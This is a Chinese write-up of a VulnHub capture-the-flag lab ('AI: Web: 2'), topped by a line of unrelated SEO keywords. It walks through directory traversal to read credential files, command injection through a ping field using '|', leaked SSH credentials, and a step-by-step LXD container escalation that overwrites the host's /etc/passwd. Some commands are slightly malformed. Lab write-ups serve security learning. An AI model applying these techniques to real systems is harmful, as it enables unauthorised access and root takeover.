怎么用ps做网站首页背景图片,wordpress人力资源模板下载,网站建设流程有几个阶段,山东济南seo整站优化费用渗透复现
平台框架存在目录穿越漏洞#xff0c;利用该漏洞读取敏感信息
Ping功能点绕过#xff0c;进行命令执行操作#xff0c;反弹shell无果后#xff0c;利用目录穿越漏洞遍历敏感API#xff0c;读取到用户SSH登录凭证
SSH登录进行Linux lxd容器提权
知识扩展
目录…渗透复现
平台框架存在目录穿越漏洞利用该漏洞读取敏感信息
Ping功能点绕过进行命令执行操作反弹shell无果后利用目录穿越漏洞遍历敏感API读取到用户SSH登录凭证
SSH登录进行Linux lxd容器提权
知识扩展
目录穿越读取敏感文件BP遍历敏感API
Ping功能通过|绕过进行命令执行
Linux lxc/lxd容器提权
靶机地址
AI: Web: 2 ~ VulnHub
主机发现
1攻击机
192.168.88.128
2目标主机
192.168.88.140
信息收集
端口扫描 端口访问 目录扫描 目录爆破 目录访问
1/index.php/login/ 2/signup.php 3/viewing.php 4/webadmin 实施攻击
1注册账号admin进入后台 2后台页面进行扫描和爆破 3进行fuzz爆破的时候一直爆文件可能是因为存在目录穿越漏洞根据后台CMS历史漏洞搜寻存在目录穿越 4BP抓包构造接口进行访问/etc/passwd只能拿到用户名 5BP遍历敏感文件在/etc/apache2/.htpasswd文件apache用户认证文件中读取到aiweb2admin的账号密码 6进行john解密后登录webadmin后台 7根据robots文件的提示进行访问
http://192.168.88.140/webadmin/H05Tpin9555/ http://192.168.88.140/webadmin/S0mextras/ 8Ping功能可以通过|绕过进行命令执行 9反弹shell无果根据/webadmin/S0mextras/页面的提示进行隐藏文件的查看
ls -al /var/www/html/webadmin/S0mextras/
find . -type -f /var/www/html/webadmin/S0mextras/ 10隐藏文件/.sshUserCred55512.txt读取到用户的SSH登陆凭证
User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf 提权
1信息收集 2linux容器提权lxc提权
#创建启动容器将宿主机的/etc目录挂载至容器
#/tmp目录下新建passwd文件并且设置root的密码
#上传/tmp目录下新建的passwd文件至容器成功覆盖宿主机/etc目录下的passwd文件
#可以理解为LXC容器存在漏洞低权限用户在容器中的操作会同步影响宿主机中的文件达到低权限操作高权限文件目的
#启动lxc容器 UbuntuMini
#将/etc目录挂载至容器
lxc start UbuntuMini
lxc config set UbuntuMini security.privileged true
lxc config set UbuntuMini security.nesting true
lxc config device add UbuntuMini sharetesting disk source/etc path/sharingiscaring#openssl生成root密码 111
openssl passwd -1 -salt root 111
$1$root$vYBCshwm6aJ/2WxkqNyVY/
#将/etc/passwd的内容复制至/tmp目录下新建的passwd中并且修改root密码
#完成passwd文件操作后将passwd文件上传至容器
lxc file push passwd UbuntuMini/sharingiscaring/passwd 3如果报错 4停止该容器并再次运行容器和执行命令
lxc stop UbuntuMini
lxc start UbuntuMini
lxc file push passwd UbuntuMini/sharingiscaring/passwd 5提权成功